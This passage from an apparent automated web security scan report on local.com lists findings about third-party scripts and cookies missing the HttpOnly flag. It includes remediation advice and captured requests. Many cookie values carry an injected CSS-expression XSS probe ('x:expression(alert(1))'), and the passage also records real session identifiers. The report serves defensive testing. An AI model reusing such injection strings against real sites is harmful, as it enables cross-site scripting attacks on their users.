The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=none

Request

Response

9.27. http://www.local.com/events/category/performing-arts/dallas-tx.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/performing-arts/dallas-tx.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=none

Request

Response

9.28. http://www.local.com/events/category/sports/dallas-tx.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/sports/dallas-tx.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=none

Request

Response

9.29. http://www.local.com/faq.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/faq.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.30. http://www.local.com/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/privacy/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.31. http://www.local.com/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Beauty+Salons&cat=womens_products_services&state=TX&city=Dallas&kw=none

Request

GET /results.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

9.32. http://www.local.com/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Retail+Banks&cat=financial_services&state=TX&city=Dallas&kw=banks

Request

Response

9.33. http://www.local.com/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Retail+Banks&cat=financial_services&state=TX&city=Dallas&kw=banks

Request

Response

9.34. http://www.local.com/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Pizza+Restaurant&cat=entertainment_leisure&state=TX&city=Dallas&kw=american+restaurants

Request

Response

9.35. http://www.local.com/sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.36. http://www.local.com/sitemap/chicago-il.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/chicago-il.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=Illinois&city=Chicago&kw=banks

Request

Response

9.37. http://www.local.com/sitemap/los-angeles-ca.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/los-angeles-ca.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=California&city=Los+Angeles&kw=banks

Request

Response

9.38. http://www.local.com/sitemap/new-york-ny.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/new-york-ny.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=New+York&city=New+York&kw=banks

Request

Response

9.39. http://www.local.com/terms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/terms/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks

Request

Response

9.40. http://www.local.com/topics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/topics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Beauty+Salons&cat=womens_products_services&state=TX&city=Dallas&kw=
http://s.skimresources.com/js/9174X678702.skimlinks.js

Request

Response

9.41. http://www.local.com/topics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/topics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://loadus.exelator.com/load/?p=235&g=001&ctg=Food+And+Dining&cat=&state=TX&city=Dallas&kw=food
http://s.skimresources.com/js/9174X678702.skimlinks.js

Request

Response

10. Cookie without HttpOnly flag set previous next
There are 43 instances of this issue:

/
/business/
/business/details/dallas-tx/amegy-bank-97648000/
/business/details/dallas-tx/cet-products-liquidators-9985416/
/business/details/dallas-tx/equity-bank-63975058/
/business/details/dallas-tx/hillcrest-bank-104826937/
/business/details/dallas-tx/sterling-bank-16856575/
/business/details/map/dallas-tx/amegy-bank-97648000/
/business/details/map/dallas-tx/cet-products-liquidators-9985416/
/business/details/map/dallas-tx/equity-bank-63975058/
/business/details/map/dallas-tx/hillcrest-bank-104826937/
/business/details/map/dallas-tx/sterling-bank-16856575/
/business/results/
/contact.aspx
/coupons/
/coupons/printable/
/details/photos/dallas-tx/amegy-bank-97648000/
/details/photos/dallas-tx/cet-products-liquidators-9985416/
/details/photos/dallas-tx/equity-bank-63975058/
/details/photos/dallas-tx/hillcrest-bank-104826937/
/details/photos/dallas-tx/sterling-bank-16856575/
/dialogs/account/acctreg.aspx
/dialogs/network.aspx
/dialogs/register.aspx
/events/
/events/category/music/dallas-tx.aspx
/events/category/performing-arts/dallas-tx.aspx
/events/category/sports/dallas-tx.aspx
/faq.aspx
/privacy/
/results.aspx
/results/
/sitemap.aspx
/sitemap/chicago-il.aspx
/sitemap/los-angeles-ca.aspx
/sitemap/new-york-ny.aspx
/terms/
/topics/
/ver1.0/Direct/JavascriptSDKProxy
/ver1.0/Direct/Jsonp
/ver1.0/Photo/Upload
/ver1.0/ReviewPage.app
/ver1.0/Video/Upload

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. http://www.local.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:12 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

10.2. http://www.local.com/business/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:55 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=local.com; expires=Thu, 03-Feb-2011 16:31:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186474914335; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.5. http://www.local.com/business/details/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/equity-bank-63975058/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; domain=local.com; expires=Thu, 03-Feb-2011 16:30:47 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.6. http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/hillcrest-bank-104826937/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186602212783; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.7. http://www.local.com/business/details/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/dallas-tx/sterling-bank-16856575/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186605902360; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:18 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:23 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:36 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:38 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:50 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.13. http://www.local.com/business/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/business/results/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:39:59 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fbusiness%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.14. http://www.local.com/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/contact.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:38 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.15. http://www.local.com/coupons/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.16. http://www.local.com/coupons/printable/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/coupons/printable/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:45:55 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.17. http://www.local.com/details/photos/dallas-tx/amegy-bank-97648000/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/amegy-bank-97648000/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:49:42 GMT; path=/
